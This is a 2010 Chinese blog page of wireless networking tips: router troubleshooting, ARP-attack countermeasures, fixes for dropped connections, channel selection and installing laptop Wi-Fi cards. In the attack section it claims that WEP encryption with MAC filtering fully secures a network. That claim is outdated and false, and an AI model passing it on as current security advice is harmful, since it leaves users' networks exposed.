无线网卡的检查也必不可少,可以更换新的网卡并重新安装驱动程序进行调试,在网卡中点击“查看可用的无线连接”刷新“网络列表”后设置网卡参数,并在“属性”中查看有无数据发送和接收情况,排除故障。

当然路由器自身的硬件故障也是导致线路不通的直接原因,但这并不是我们所能解决的范围,应及时联系厂商进行维修或更换。

设置不当无法连接

“设置”可以分为计算机设置和路由器设置两个方面:计算机的设置相对简单,点击进入“网上邻居”属性,开启“无线网络连接”,然后设置“IP地址”、“子网掩码”及“网关”,只要使计算机的IT地址与无线路由器的IT地址在同一网段即可。“网关”的设置可以参见网卡说明书中所述,一般情况下与路由器IP地址相同。

路由器的设置相对较为专业、复杂些。首先在系统浏览器中输入无线路由器IT地址,在弹出的登录界面中输入路由器的管理员登录名及密码即可进入设置界面,此时需要检查网络服务商所给你的宽带账号及口令是否正确,如不正确,更正后尝试连接,如果连接后仍无法打开页面请点击进入路由器中的“安全设置”选项,查看是否开启“网络防火墙”、“IP地址过滤”以及“MAC地址过滤”选项,并做更正和设置,排除无法开启网络的故障。

网络攻击导致联网异常

ARP攻击以及非法入侵未设防的无线局域网已经是现在导致联网异常的典型案例了。由于安全设置的疏忽以及后期安全防护的不足,导致少数具有恶意的黑客对企业的重要信息及保密数据造成了极大的危害。

ARP攻击会造成网络IT冲突,数据的丢失及溢出,更有甚者会导致网络瘫痪。这些现象对企业组网的威胁都是很大的。

首先进入“带有网络的安全模式”在无线网卡属性处更换电脑的IT地址,之后查看是否可以联网。另外购买安装专业的杀毒软件及网络防火墙是比较捷径的方法之一。

其次进入路由器“安全设置”选项进行高级设置。现在的大部分无线路由器都具有WEP的密码编码功能,用最长128bit的密码键对数据进行编码,在无线路由器上进行通信,密码键长度可以选择40bit或128bit。利用MAC地址和预设的网络ID来限制哪些无线网卡和接入点可以进入网络,完全可以确保网络安全。对于非法的接收者来说,截听无线网的信号是非常困难的,从而可以有效地防范黑客的入侵破坏和非法用户恶意的网络攻击。

最后要注意,在没有特殊需要或不具有专业技能的情况下禁止开启路由器中的“远程WEB管理”功能选项。

路由器部分功能失灵无法使用

这个问题大多存在于一些老款的无线路由器中,当我们在配置路由器高级功能选项的时候,在反复确认连接无误的情况下就是有部分功能无法开启使用,这时你也许第一想到是否是硬件出了故障,其实不然。

首先我们要查看一下路由器系统的版本,在查阅无线路由器说明书后,看该功能是否支持这个版本的路由器系统。路由器的系统通常有许多版本,每个版本支持不同的功能。如果你当前的软件版本不支持这个功能,那就应该找到相应的软件,先进行升级。

点击进入无线路由器的“系统工具”选项,进入后选择“软件升级”,此时在对话界面中会显示当前的软件版本和硬件版本,在弹出的对话框中输入“文件名”(即系统升级的文件名)和“TFTP服务器IP”后点击“升级”即可。

升级时要注意:选择与当前硬件版本一致的软件进行升级,在升级过程中千万不要关闭路由器的电源,否则将导致路由器损坏而无法使用,在网络稳定的情况下升级过程很短,整个过程不会超过一分钟。当你发现路由器在升级完毕后重启,请不要担心,这是正常的,一般升级过后,路由器工作情况会更加稳定,并增加一些适用于此版本更多的新功能
类别:Wireless N.T | Tags: , | 0 条评论, 511 次阅读
Oct
16
2010
无线路由器故障是我们最为常见的故障,那么对于这部分内容我们将详细为大家讲解一下。最近在网上各大论坛中,有不少网友反应家里的路由器会出现24小时掉线一次的情况,其实这很可能是运营商防止盗号的一种手段,用户不必过多担心。不过除了运营商和路由器本身质量问题外,在很多情况下由于用户使用方式和配置不正确引起的路由器掉线问题还是很常见的。下面,笔者搜集了一些网友的求助贴,并加以说明,希望对您能有所帮助。

一位名为“cuteroy”提问:我家里用的是一台54M无线路由器,以前只一台机子时从未出现过掉线现象,自从买了笔记本后却经常出现掉线,请问有遇到类似情况的吗?可能问题是什么?怎么解决?

作为一名家庭用户,cuteroy的问题具有相当的普遍性,无线路由器在正常使用一段时间后,总是莫名的出现品但掉线的情况。对于这个问题,我们必须考虑到无线路由的工作原理和家庭环境的特殊性。

针对cuteroy出现的问题,我们首先要考虑的是接收端的问题,也就是笔记本端。无论是迅驰笔记本还是安装了无线网卡的笔记本,都可能由于由于网卡的兼容性或者是驱动问题引起网络链接出错。

首先,我们应该确认的是网卡本身有没有质量缺陷,之后检查网卡的驱动是否正常,或者是驱动版本过老。如果笔记本使用的是无线网卡与路由连接,那么除了无线套装外,大多数不同品牌的无线网卡和路由都是可以兼容的,但也不排除有极少数产品间的互操作性不理想。

另外,家庭环境的随意性较大,摆放无线路由器故障可能会被经常变动,但由于无线路由器是通过电磁波来传输信号的,我们在选择摆放位置时就必须要考虑到环境问题。尽可能的使路由远离无绳电话、微波炉;另外,甚至是空调、洗衣机、冰箱这样的电器,避免产生电磁干扰或掉线的情况发生。

由于无线网络传播信号的特殊性,我们在安装或者布网时,不得不考虑环境问题。在家庭中,能狗影响无线网络的设备主要有:无绳电话、微波炉;无线路由器故障另外,甚至是空调、洗衣机、冰箱这样的电器也都有可能产生电磁干扰。

在尽量避开电器的同时,笔者建议大家把路由器摆放在房间的中间位置,之所以这样做是因为无线设备的传输范围是一个球体,在房间的中间位置,可以让信号范围的直径覆盖全屋,以达到较好的传输效果。

另外,关于无线路由天线的位置也值得注意。目前大多数家用无线路由器的天线都是全向的,它的摆放角度会一定程度地影响到信号好坏,至于怎样摆才能达到最好的信号效果,还需用户根据实际环境来自己调整。

信道冲突。随着无线产品在家庭中的普及,信道的选择是我们不得不考虑的一个因素,在有多个无线设备使用相同信道的时候(例如邻居),很有可能出现传输不理想甚至是无线路由器故障的情况。如果发生信道冲突的情况,您可以在路由器的配置界面里,根据这个区域里所有的无线信道,选择一个最适合自己的来使用。(选择信道时最好能避开已占用信道数的上下2位)

无线路由器故障另外,IEEE802.11b/g标准其都只支持3个不重叠的传输信道信道,只有信道1、6、11或13是不冲突的,但使用信道3的设备会干扰1和6,使用信道9的设备会干扰6和13……。解决的办法是在无线路由器设置界面中更改为不常用的无线信道,分别采用1、6、11不同的信道,以减少冲突。

当然,对于习惯长时间开启无线路由的用户来说,频繁掉线也可能是由于路由器散热问题引起的。这时,我们需要注意用外部散热器进行辅助散热,并注意不要将宽带设备、无线路由器等叠加在一起使用,这样会加重各类设备的散热负担。由于家庭无线网络的环境比较简单,所以笔者认为只要注意使用细节和路由器“保养”基本不会出现严重的掉线无线路由器故障。
类别:Wireless N.T | Tags: , , | 0 条评论, 603 次阅读
Oct
12
2010
自己动手来升级无线网卡

弄清了低价笔记本内部的相关情况以及各种端口的无线网卡的优劣,购买相应产品后就可以动手升级无线网卡了。由于内置无线网卡与外置无线网卡在升级过程中有很大区别,下面将分别叙述两大类无线网卡的升级过程。

1、升级内置无线网卡:

升级无线网卡,从目前的低价笔记本电脑的主板设计来看,一部分低价笔记本主板上的相关扩展槽设计在机身底部,不过多数机型还是机身正面,位于键盘、掌托之下,两者之间的拆机过程还是有很大的不同。

对于扩展槽设计在机身底部的机型且内置天线的机型来说,升级很方便。升级方法类似于内存升级,只需要将机身后盖板上的螺丝卸下,打开盖板就可以看到无线网卡的扩展槽。可以像插入内存一样,以45度角将无线网卡插到扩展槽内压下扣紧即可。然后将扩展槽边上预置的两条天线——白色、灰色各一条,上面分别标有“MAIN”和“AUX”——接驳到无线网卡上相对应的卡口上即可。

对于内置天线但扩展槽设计在机身正面的机型来说,插入无线网卡及接驳天线的方法没有太大的区别,但拆机过程就较复杂了。一般需拆下笔记本键盘和掌托方能实现。由于各品牌键盘和掌托拆卸方法有所不同,难以一言蔽之。现在以IBM T40为例介绍一下键盘和掌托的拆卸方法——先卸下机身底部的四颗3号螺丝,然后翻过机身,将键盘向前推,键盘就会脱离机身而弹起。将数据线与主板上的接口轻轻拔下,整个键盘才算是完全卸下了。千万要注意,键盘之下有数据线与主板相连,一定要轻轻用力,以免扯断。拆掌托稍稍麻烦一点,先要拆下机身底部的全部4号螺丝以及机身前端的所有1号及2号螺丝,由前向右稍加力即可掀开掌托,就可看到无线网卡扩展槽,加载无线网卡并接驳好天线后,依次装上掌托和键盘就可完成安装。其他品牌机型可以按照相关用户手册或者拆机手册,参考以上步骤升级无线网卡来完成。

如果说上面这样的扩展方法有点麻烦的话,那么没有内置天线的机型则更麻烦一点。有些用户为了贪图方便,将天线布在机身周围,其信号与外置无线网卡相比未见多少优势。从实际升级实例来看,还是将天线布在屏幕周围,信号才会较强。因此最好拆掉屏框进行合理布线。天线可从屏幕布置一圈之后,从屏轴中间穿过引到扩展槽上。在主板上布线时,应该避开发热大的部件,比如CPU风扇、北桥芯片、显卡、内存等。使用透明胶带,间隔一定距离来固定天线可达到事半功倍的效果。若是扩展槽位于机身底部,天线需要穿过主板与机身之间的空隙,可能稍麻烦一点。因为各款机型设计不同,而升级时最好从间隙最大的地方穿过去。因此天线最好稍微买长一些,以防布线长度不足。

种升级方法对于用户来说动手能力要求较强,若是DIY功夫较弱的话,升级外置无线网卡也不失为一个稳妥的做法。

2、升级外置无线网卡:

升级无线网卡的过程中,与升级内置无线网卡需要开膛剖肚相比,升级外置无线网卡则要方便多——只需要将无线网卡插入相应插槽即可。所以不在赘述。

需要提醒的是,在插入PCMCIA或PCI-Express Card无线网卡时需要注意插入的方向问题,难以插入时切记不要使用蛮力,这是扩展槽的防呆功能在提醒插入的方向不正确,可请拔出后反向插入试试。需要卸无线网卡时,最好现关机,按一下槽边的蓝色退格按钮即可将无线网卡退出,切记不要强行拔出,以免损坏扩展槽及无线网卡。

总的来说,低价笔记本虽然没有内置无线网卡,但往往价格低廉了很多,购买此类笔记本,再另购升级,不失为一个“曲线救国”的节约之法。值得一些囊中羞涩的消费者考虑。当然,在财力充足的情况下,购买已内置无线网卡的笔记本还是最稳妥的做法。
类别:Wireless N.T | Tags: , , | 0 条评论, 536 次阅读
Oct
12
2010
分页: 1/3 第一页 1 2 3 下页 最后页 [ 显示模式: 摘要 | 列表 ]